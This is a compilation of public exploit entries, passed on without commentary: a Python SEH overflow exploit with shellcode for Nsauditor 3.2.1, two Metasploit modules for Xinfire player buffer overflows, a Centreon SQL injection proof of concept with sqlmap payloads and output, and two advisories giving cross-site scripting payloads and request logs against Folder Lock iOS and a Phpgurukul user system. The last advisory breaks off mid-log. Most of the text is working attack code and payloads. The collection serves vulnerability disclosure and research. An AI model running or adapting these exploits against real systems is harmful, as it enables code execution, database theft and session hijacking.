# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
# 3 -> Open Nsauditor
# 4 -> In the Window select "Tools" -> "Dns Lookup"
# 5 -> Paste the content into the Field: "Dns Query'"
# 6 -> Click "Resolve"

#!/usr/bin/python3

# Badchars -> 
\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6
# Maybe less badchars between \x80 and \x9f but I was lazy (I just 
checked thoose I needed)

# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v 
shellcode
shellcode =  b""
shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"
shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"
shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"
shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"
shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"
shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"
shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"
shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47"
shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"
shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"
shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"
shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"
shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"
shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"
shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"
shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"
shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"
shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"
shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"
shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"
shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"
shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"
shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"
shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"
shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"
shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"
shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"
shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"
shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"
shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"
shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"
shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"
shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"
shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"
shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"
shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"


# 0x006ea017 : pop esi # pop ecx # ret  | startnull 
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, 
SafeSEH: False, OS: False, v3.0.28.0 (C:\Program 
Files\Nsauditor\Nsauditor.exe)
# 0x006ea017 : pop esi # pop ecx # ret  | startnull 
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, 
SafeSEH: False, OS: False, v3.2.1.0 (C:\Program 
Files\Nsauditor\Nsauditor.exe)

pop_pop_ret = b"\x17\xa0\x6e"
jmp_back = b"\xeb\xc3\x90\x90"  #JMP    0xffffffc5

# An address near the end of our buffer is on the stack, only three pop 
are needed to get it
# Then we just have to moving at the begging of our buffer
# An egghunter does the job, but will not be compatible with all Windows 
versions
going_back = b"\x58"            #POP EAX
going_back += b"\x58"           #POP EAX
going_back += b"\x58"           #POP EAX
going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
going_back += b"\xFF\xE0"       #JMP EAX

buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100)
buffer += shellcode + b"\x90"*100
buffer += going_back
buffer += jmp_back + pop_pop_ret #nSEH / SEH

# Write the exploit
file = open("nsauditor-3-2-1-exploit.txt", "wb")
file.write(buffer)
file.close()

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Xinfire TV Player Buffer Overflow',
'Description'    => %q{
          This module exploits a buffer overflow in Xinfire TV Player Pro and Standard v6.0.1.2.When
        the application is used to import a specially crafted plf file, a buffer overflow occurs
        allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as 
        Aviosoft Digital TV Player and BlazeVideo HDTV Player.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'metacom' # MSF Module and Vulnerability discovery 
        ],
'References'     =>
        [
          [ 'OSVDB', '' ],
          [ 'EDB', '' ],
          [ 'EDB', '' ]
        ],
'DefaultOptions' =>
        {
'EXITFUNC' => 'process',
        },
'Payload'        =>
        {
'Space'    => 1384,
'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
'DisableNops' => true,
        },
'Platform' => 'win',
'Targets'  =>
        [  
          [ 'Windows Universal', { 'Ret' => 0x613018E9, 'Offset' => 608 } ],  # p/p/r DTVDeviceManager.dll
        ],
'Privileged'     => false,
'DisclosureDate' => 'Apr 16 2020',
'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ])

  end

  def exploit

    buffer = rand_text(target['Offset'])  #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded  #1384 bytes of space
    # more junk may be needed to trigger the exception

    file_create(buffer)

  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Xinfire DVD Player Buffer Overflow',
'Description'    => %q{
          This module exploits a buffer overflow in Xinfire DVD Player Pro and Standard v5.5.0.0.When
        the application is used to import a specially crafted plf file, a buffer overflow occurs
        allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'metacom' # MSF Module and Vulnerability discovery
        ],
'References'     =>
        [
          [ 'OSVDB', '' ],
          [ 'EDB', '' ],
          [ 'EDB', '' ]
        ],
'DefaultOptions' =>
        {
'EXITFUNC' => 'process',
        },
'Payload'        =>
        {
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x1a\x20",
'Space' => 1000,
        },
'Platform' => 'win',
'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x6160174F, 'Offset' => 608 } ],  # p/p/r EPG.dll
        ],
'Privileged'     => false,
'DisclosureDate' => 'Apr 15 2020',
'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ])

  end

  def exploit

    buffer = rand_text(target['Offset'])  #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded  # 1000 bytes of space
    # more junk may be needed to trigger the exception

    file_create(buffer)

  end
end

# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
# Date: 2020-04-19
# Exploit Author: Basim alabdullah
# Vendor Homepage: https://www.centreon.com
# Software Link: https://download.centreon.com/
# Version: v.19.10.5
# Tested on: Centos 5


[EXECUTIVE SUMMARY]

 Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.

 Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
 Downloaded by hundreds and thousands of IT professionals worldwide.
 The analysis discovered a time-based blind SQL
 injection vulnerability in the tracker functionality of
 Centreon Monitoring software. A malicious user can inject arbitrary
 SQL commands to the application. The vulnerability lies in the project tracker
 service search functionality; depending on project visibility successful
 exploitation may require user authentication. A successful attack
 can read, modify or delete data from the database or execute arbitrary commands on the underlying system.

[VULNERABLE VERSIONS]

 The following version of the Centreon Monitoring was affected by the
 vulnerability; previous versions may be vulnerable as well:
 - Centreon version 19.10.5


[Proof of Concept]

 http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23


 [Payloads]

  Parameter: svc_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: hid=15&svc_id=1 OR NOT 5782=5782

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
---
[12:24:35] [INFO] testing MySQL
[12:24:35] [INFO] confirming MySQL
[12:24:35] [INFO] the back-end DBMS is MySQL
[12:24:35] [INFO] fetching banner
web server operating system: Linux Red Hat
web application technology: Apache 2.4.34, PHP 7.2.24
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.1.38-MariaDB'
[12:24:35] [INFO] fetching database names
[12:24:35] [INFO] starting 4 threads
[12:24:35] [INFO] resumed: 'centreon'
[12:24:35] [INFO] resumed: 'test'
[12:24:35] [INFO] resumed: 'centreon_storage'
[12:24:35] [INFO] resumed: 'information_schema'
available databases [4]:                                                                                                                                                               
[*] centreon
[*] centreon_storage
[*] information_schema
[*] test

Document Title:
===============
Folder Lock v3.4.5 iOS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2210


Release Date:
=============
2020-04-20


Vulnerability Laboratory ID (VL-ID):
====================================
2210


Common Vulnerability Scoring System:
====================================
4.2


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Folder Lock lets you password-protect your personal files, photos,
videos, documents, contacts, wallet cards, notes and
audio recordings in your iPhone. Apart from being a perfect data
security app, Folder Lock is a perfect WiFi manager
app too, as you can transfer files from your iPhone to PC, or vice
versa, wireless via Folder Lock. Its WiFi Music Manager
feature allows you the options of audio import, music import, song
import and mp3 import without using iTunes.

(Copy of the Homepage:
https://apps.apple.com/us/app/folder-lock/id372925917 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Folder Lock v3.4.5 mobile ios application.


Affected Product(s):
====================
NewSoftwares.net
Product: Folder Lock v3.4.5 - Apple iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
Multiple persistent cross site scripting vulnerability has been
discovered in the official Folder Lock v3.4.5 mobile ios application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent input validation vulnerability is located in the `create`
module with the `Create Folder` function. Remote attackers
are able to inject own malicious persistent script codes as path or
foldername. After the inject the code executes persistent from the
application-side. The request method to inject is POST and the attack
vector is located on the application-side. The injection point
is the create folder function and the execution point occurs with any
path/file index dir listing on preview.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Function(s):
[+] Create Folder

Vulnerable Module(s):
[+] path



1.2
Multiple non-persistent cross site web vulnerabilities has been
discovered in the official Folder Lock v3.4.5 mobile ios application.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise browser
to web-application requests from the client-side.

The non-persistent cross site scripting vulnerabilities are located in
the `path` parameter of the `list` and `download` module.
Remote attackers are able to inject own malicious script code to
client-side requests with non-persistent attack vector.
The request method to inject is GET and the attack vector is located on
the client-side. The injection point is the vulnerable
`path` parameter and the execution occurs in the not sanitized error
exception output message.

Successful exploitation of the vulnerability results in session
hijacking, non-persistent phishing attacks, non-persistent external
redirects to malicious source and non-persistent manipulation of
affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./list
[+] ./download

Vulnerable Parameter(s):
[+] path


Proof of Concept (PoC):
=======================
1.1
The persistent input validation web vulnerability can be exploited by
remote attackers with wifi ui access with low user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.


PoC: Vulnerable Source
<ol class="breadcrumb" id="path" style="cursor: pointer;"><li
data-path="/"><a>IOS-DEVICENAME</a></li><li data-path="/Audios/">
<a>Audios</a></li><li class="active">test"><iframe src="evil.source"
onload="alert(document.domain)"></li></iframe></li></ol>


--- PoC Session Logs (POST) --- [Create Folder]
http://localhost/create
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 89
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
path=/Audios/test"><iframe src=evil.source onload=alert(document.domain)>
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 2
Content-Type: application/json
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close


Reference(s):
http://localhost/create



1.2
The non-persistent cross site web vulnerabilities can be exploited by
remote attackers with wifi ui access with low user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.


PoC: Vulnerable Source
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>HTTP
Error 404</title></head><body><h1>
HTTP Error 404: <iframe src=evil.source onload=alert(document.domain)>
does not exist</h1><h3></h3></body></html>


--- PoC Session Logs (GET) --- [List Error Exception]
http://localhost/list?path=>"<iframe src=evil.source
onload=alert(document.domain)>
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Content-Length: 237
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:
http://localhost/list?path=%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.domain)%3E
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close
Date: Tue, 14 Apr 2020 17:53:23 GMT

--- PoC Session Logs (GET) --- [Download Error Exception]
http://localhost/download?path=>"<iframe src=evil.source
onload=alert(document.domain)>
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Content-Length: 237
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:
http://localhost/download?path=%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.domain)%3E
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close

References:
http://localhost/list?path=
http://localhost/download?path=


Security Risk:
==============
1.1
The security risk of the persistent validation web vulnerabilities in
creat folder function is estimated as medium.

1.2
The security risk of the client-side cross site scripting web
vulnerabilities in the path parameter is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Document Title:
===============
Phpgurukul User Registration v2.0 - Multiple Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2216


Release Date:
=============
2020-04-20


Vulnerability Laboratory ID (VL-ID):
====================================
2216


Common Vulnerability Scoring System:
====================================
5.4


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
User Registration & Login and User Management System With Admin Panel v2.0.

(Copy of the Homepage:
https://phpgurukul.com/?smd_process_download=1&download_id=7003 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the Phpgurukul User Registration & User Management
System v2.0.


Affected Product(s):
====================
Anuj Kumar
Product: User Registration & Login and User Management System With Admin
Panel v2.0 (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2020-04-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been
discovered in the Phpgurukul User Registration & User Management System
v2.0.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application
requests from the application-side.

The persistent cross site web vulnerabilities are located in the
`firstname` and `lastname` parameters of the registration form &
loginsystem input fields.
Remote attackers are able to register with malicious script code as
firstname or lastname to manipulate the `manage-users.php` and
`update-profile.php`
files visible for administrators in the backend. The injection point is
the registration or user edit module and the execution occurs on
manage-users
preview or user edits. The request method to inject is POST and the
attack vector is located on the application-side.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Input(s):
[+] firstname
[+] lastname

Vulnerable Module(s):
[+] Registration (Login-System)

Vulnerable Parameter(s):
[+] fname
[+] lname

Affected Module(s):
[+] Manage Users (manage-users.php)
[+] Update User (update-profile.php)


Proof of Concept (PoC):
=======================
The persistent input validation vulnerabilities can be exploited by
remote attackers without privileged user account and with low user
interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce ...
1. Open the registration formular
2. Inject payload in firstname and lastname values
3. Submit the request via POST method
4. Wait until the admin previews the users listing without any activations
Note: The execution occurs on user edit and in the user management listing
5. On preview the cookie transmits to attacker and he can login with non
expired cookie
7. Successful reproduce of the vulnerability!


--- PoC Session Logs (POST) --- (Inject)
https://localhost:8080/project/loginsystem/
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------84460134629716292423840703493
Content-Length: 897
Origin: https://localhost:8080
Connection: keep-alive
Referer: https://localhost:8080/project/loginsystem/
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4
fname=test1>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&lname=test2>"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>&email=keymaster31337@protonmail.com&password=whoami23&contact=31337317&signup=Sign
Up
-
POST: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2


PoC: Vulnerable Source (Execution Point - manage-users.php)
<tr>
<td>585</td>
<td>test1>"<iframe src="evil.source"
onload="alert(document.cookie)"></iframe></td>
<td>test2>"<iframe src="evil.source"
onload="alert(document.cookie)"></iframe></td>
<td>keymaster31337@protonmail.com</td>
<td>31337317</td><td>2020-04-19</td>
<td>
<a href="update-profile.php?uid=1223">
<button class="btn btn-primary btn-xs"><i class="fa
fa-pencil"></i></button></a>
<a href="manage-users.php?id=1223">
<button class="btn btn-danger btn-xs" onclick="return confirm('Do you
really want to delete');"><i class="fa fa-trash-o "></i></button></a>
</td>
</tr>


--- PoC Session Logs (GET) --- (Execution Admin Backend)
https://localhost:8080/project/loginsystem/admin/manage-users.php
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer:
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4; _gat_gtag_UA_106216538_1=1
-
GET: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2
-
https://localhost:8080/project/loginsystem/admin/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://localhost:8080/project/loginsystem/admin/manage-users.php
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4; _gat_gtag_UA_106216538_1=1
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-cache, must-revalidate, max-age=0
link: <https://localhost:8080/wp-json/>; rel="https://api.w.org/"
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2


PoC: Vulnerable Source (Execution Point - update-profile.php)
<section class="wrapper">
<h3><i class="fa fa-angle-right"></i> test1>"<iframe src="evil.source"
onload="alert(document.cookie)"></iframe>'s Information</h3>
<div class="row">
<div class="col-md-12">
<div class="content-panel">
<p style="color:#F00;" align="center"></p>
<form class="form-horizontal style-form" name="form1" method="post"
action="" onsubmit="return valid();">
<p style="color:#F00"></p>
<div class="form-group">
<label class="col-sm-2 col-sm-2 control-label"
style="padding-left:40px;">First Name </label>
<div class="col-sm-10">
<input type="text" class="form-control" name="fname" value="test1>"
<iframe="evil.source" src="evil.source"
onload="alert(document.cookie)">">
</div>
</div>
<div class="form-group">
<label class="col-sm-2 col-sm-2 control-label"
style="padding-left:40px;">Last Ename</label>
<div class="col-sm-10">
<input type="text" class="form-control" name="lname" value="test2>"
<iframe="evil.source" src=evil.source" onload="alert(document.cookie)">"
>
</div>
</div>


--- PoC Session Logs [POST] ---
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
Origin: https://localhost:8080
Connection: keep-alive
Referer:
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4
fname=hello>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&lname=world>"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>&email=htp2020@protonmail.com&contact=2020-04-06,2020-03-06&Submit=Update
-
POST: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-encoding: gzip
